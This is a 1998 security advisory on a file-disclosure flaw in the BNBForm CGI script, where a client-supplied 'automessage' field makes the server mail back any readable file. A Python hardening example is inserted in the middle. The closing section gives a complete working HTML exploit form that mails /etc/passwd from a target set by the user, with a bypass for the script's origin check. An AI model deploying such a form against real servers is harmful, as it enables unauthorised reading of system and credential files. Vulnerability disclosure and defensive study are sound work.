Vulnerable program: BNBForm (bnbform.cgi)
         Platforms: UNIX
            Impact: remote users can read arbitrary files on the filesystem.
          Found By: duke (duke@viper.net.au - duke@el8.org)
     Advisory Made: Thursday, December 3, 1998

Information
-----------

BNBForm is a form processing cgi by BigNoseBird, and is available at:
http://bignosebird.com/carchive/bnbform.shtml. The problem is that the
script sends an auto-reply email to the submitter containing the contents
of whatever file is named in the 'automessage' form variable. Since that
variable is supplied by the client, it can name any file on the server
that is readable by the uid of the webserver.

There is also a security mechanism, controlled by a $SECURE_NAME variable,
intended to prevent this cgi script from being driven by forms hosted on
other servers. It is easily bypassed by copying the "submit_to" field off
of the intended form onto the malicious form, since the check relies on a
value the client supplies. This mechanism is disabled by default.
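The following is an added example, not code from the advisory or from BigNoseBird's bnbform.cgi, and it is written in Python rather than the script's Perl. It shows the server-side handling that closes both problems described above: the 'automessage' value is treated as a key into an administrator-controlled allowlist instead of as a filesystem path, and the decision never depends on a client-supplied field such as submit_to. AUTOMESSAGE_DIR and ALLOWED_MESSAGES are assumed names with constructed values; the real script has no such configuration.

```python
"""
Hardened lookup for an auto-reply message file (added example; not from
the advisory or from bnbform.cgi). The configuration names below are
assumptions chosen for this example.
"""
import os
import posixpath
from typing import Optional

# Directory the administrator controls; only files below it may ever be
# sent back to a submitter. (Assumed value, not from the advisory.)
AUTOMESSAGE_DIR = "/var/www/bnbform/messages"

# Explicit allowlist of message files a form may request. A name that is
# not listed is rejected even if such a file exists in AUTOMESSAGE_DIR.
# (Constructed sample values.)
ALLOWED_MESSAGES = {"thanks.txt", "order-received.txt"}


def resolve_automessage(requested: str) -> Optional[str]:
    """Map the client-supplied 'automessage' value to a path we are willing
    to read, or return None if the request must be refused.

    The vulnerable script opens the value as a path, which is why
    '/etc/passwd' works in the advisory. Here the value is an opaque key:
    it must be a bare filename, it must be on the allowlist, and the
    resolved path must still lie inside AUTOMESSAGE_DIR.
    """
    if not requested:
        return None
    # Reject absolute paths, any directory component, and '.'/'..'.
    if requested != posixpath.basename(requested) or requested in (".", ".."):
        return None
    if requested not in ALLOWED_MESSAGES:
        return None
    # Defence in depth: after the allowlist, confirm the real path (with
    # symlinks resolved) is still under the message directory.
    base = os.path.realpath(AUTOMESSAGE_DIR)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def autoreply_body(form: dict) -> str:
    """Build the auto-reply text for a submitted form (dict of field -> value).

    Unlike the original, an unusable 'automessage' value does not make the
    script read an arbitrary file; it falls back to a fixed message. No
    client field (submit_to included) is consulted for this decision.
    """
    if form.get("autorespond", "").lower() != "yes":
        return ""
    path = resolve_automessage(form.get("automessage", ""))
    if path is None or not os.path.isfile(path):
        return "Thank you, your form was received."
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


if __name__ == "__main__":
    # The values from the advisory's sample form are refused.
    sample = {"autorespond": "yes", "automessage": "/etc/passwd"}
    print(resolve_automessage(sample["automessage"]))   # None
    print(autoreply_body(sample))                        # fixed fallback text
```

The allowlist is the control that matters; the basename and realpath checks only guard against a misconfigured allowlist or a symlink planted in the message directory. Logging refused 'automessage' values (without echoing them into the reply) gives operators a cheap detection signal for probes like the one in this advisory.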

Exploit
-------

The following form is a sample exploit. It will mail you the /etc/passwd 
file off of the server running the script. (If you get an empty email, 
check the headers of the mail.) Change www.victim.com to your target, 
and fill in the form. As previously mentioned, if $SECURE_NAME is set, you 
may have to add a hidden field for "submit_to" that is the same as the 
target's submit_to field.

<HTML>
<BODY BGCOLOR="#CCCCCC">
<CENTER>
<FONT FACE="ARIAL" SIZE="5"><B>BIGNOSEBIRD.COM's<BR>
ALL PURPOSE / ALL FUNCTION<BR>
FORM HANDLER</B></FONT><BR>
<I>with auto e-mail reply</I>!
</CENTER>
<P>

<FORM METHOD="POST" ACTION="http://www.victim.com/cgi-bin/bnbform.cgi">
<PRE>

 FIELDS MARKED WITH * ARE REQUIRED!

 Your Name:*          <INPUT TYPE="TEXT" NAME="name" SIZE=35 MAXLENGTH=50>

 E-Mail Address:*     <INPUT TYPE="TEXT" NAME="submit_by" SIZE=35 MAXLENGTH=50>

                      <INPUT TYPE="submit" VALUE="Send Mail!"><input type="reset" value=" Clear-Form">
</PRE>

<!--  SCRIPT CONFIGURATION SECTION -->
<INPUT TYPE="HIDDEN" NAME="required"
    VALUE="name">
<INPUT TYPE="HIDDEN" NAME="data_order"
    VALUE="name">
<INPUT TYPE="HIDDEN" NAME="autorespond" VALUE="yes">
<INPUT TYPE="HIDDEN" NAME="automessage" VALUE="/etc/passwd">
<INPUT TYPE="HIDDEN" NAME="form_id" VALUE="My Test Form">
<INPUT TYPE="HIDDEN" NAME="ok_url"
     VALUE="http://127.0.0.1/thanks.html">
<INPUT TYPE="HIDDEN" NAME="not_ok_url"
     VALUE="http://127.0.0.1/oops.html">
<!--  END OF SCRIPT CONFIGURATION SECTION -->
</FORM>

</BODY>
</HTML>
